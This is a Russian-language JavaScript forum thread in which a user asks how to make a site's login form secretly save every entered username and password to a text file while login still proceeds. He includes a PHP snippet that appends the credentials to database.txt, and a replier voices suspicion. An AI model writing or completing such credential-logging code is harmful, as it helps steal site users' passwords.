Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 19.07.2017, 18:08
Новичок на форуме
Отправить личное сообщение для Fantik Посмотреть профиль Найти все сообщения от Fantik
 
Регистрация: 19.07.2017
Сообщений: 3

Сохранение данных из форм в .txt при авторизации
Добрый день друзья.
Есть форма авторизации за сайте
<form method=post  name=mainform onsubmit="return checkform()">
<input type=hidden name=a value='do_login'>
<input type=hidden name=follow value='{$frm.follow}'>
<input type=hidden name=follow_id value='{$frm.follow_id}'>
<table cellspacing=0 cellpadding=2 border=0>
<tr>
 <td>Username:</td>
 <td><input type=text name=username value='{$frm.username|escape:"html"}' class=inpts size=30></td>
</tr><tr>
 <td>Password:</td>
 <td><input type=password name=password value='' class=inpts size=30></td>
</tr>
{if $userinfo.validation_enabled == 1}
<tr>
 <td class=menutxt><img src="?a=show_validation_image&{$userinfo.session_name}={$userinfo.session_id}&rand={$userinfo.rand}"></td>
 <td><input type=text name=validation_number class=inpts size=30></td>
</tr>
{/if}
<tr>
 <td>&nbsp;</td>
 <td><input type=submit value="Login" class=sbmt></td>
</tr></table>
</form>

Мне нужно сделать так ,чтобы при авторизации в кабинет после нажатия кнопки"Login" на сервере парралельно записывались и сохранялись в txt документ value данные, полей input type=text name=username value='' ,<input type=password name=password value=''
Я пробовал реализовать всё посредством php, добавив атрибут action=

<form method=post action="test.php" name=mainform onsubmit="return checkform()">


test.php
<?PHP
$Log = $_POST['username'];
$Pass = $_POST['password'];
$log = fopen("database.txt","at");
fwrite($log,"\n $Log:$Pass \n");
fclose($log);
?>

Данные пишет но заход в кабинет не происходит, просто перебрасывая на test.php
Прошу помочь решить вопрос, в php варианте либо js.

Последний раз редактировалось Fantik, 19.07.2017 в 18:13.
Ответить с цитированием
  #2 (permalink)  
Старый 20.07.2017, 09:03
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Сообщение от Fantik
Мне нужно сделать так ,чтобы при авторизации в кабинет
Ой ли атворизация ли это?
Ответить с цитированием
  #3 (permalink)  
Старый 23.07.2017, 00:50
Новичок на форуме
Отправить личное сообщение для Fantik Посмотреть профиль Найти все сообщения от Fantik
 
Регистрация: 19.07.2017
Сообщений: 3

Сообщение от laimas Посмотреть сообщение
Ой ли атворизация ли это?
Это что, троллинг такой?
Ответить с цитированием
  #4 (permalink)  
Старый 23.07.2017, 00:51
Новичок на форуме
Отправить личное сообщение для Fantik Посмотреть профиль Найти все сообщения от Fantik
 
Регистрация: 19.07.2017
Сообщений: 3

Может кто тему удалить? Уже неактуально
Ответить с цитированием
  #5 (permalink)  
Старый 23.07.2017, 02:33
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Сообщение от Fantik
Это что, троллинг такой?
Не смешите котенка, это регистрация/авторизация, если все пишется в файл. Это на заре первой революции актуально было, но только не сейчас.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сохранение и чтение данных в javascript mexoboy Общие вопросы Javascript 2 10.01.2013 15:48
Скрипт по добавлению списка баз данных при входе в систему! Demidovstan Сайт Javascript.ru 3 13.05.2009 17:36
Вывод данных единожды, при открытии окна? Ggorsh Events/DOM/Window 1 28.04.2009 01:04
Сохранение данных для передачи с одной страницы в другую Andrey Freeman Общие вопросы Javascript 6 15.09.2008 22:32
Сохранение данных на стороне клиента средствами Javascript baal1988 Events/DOM/Window 4 24.08.2008 21:32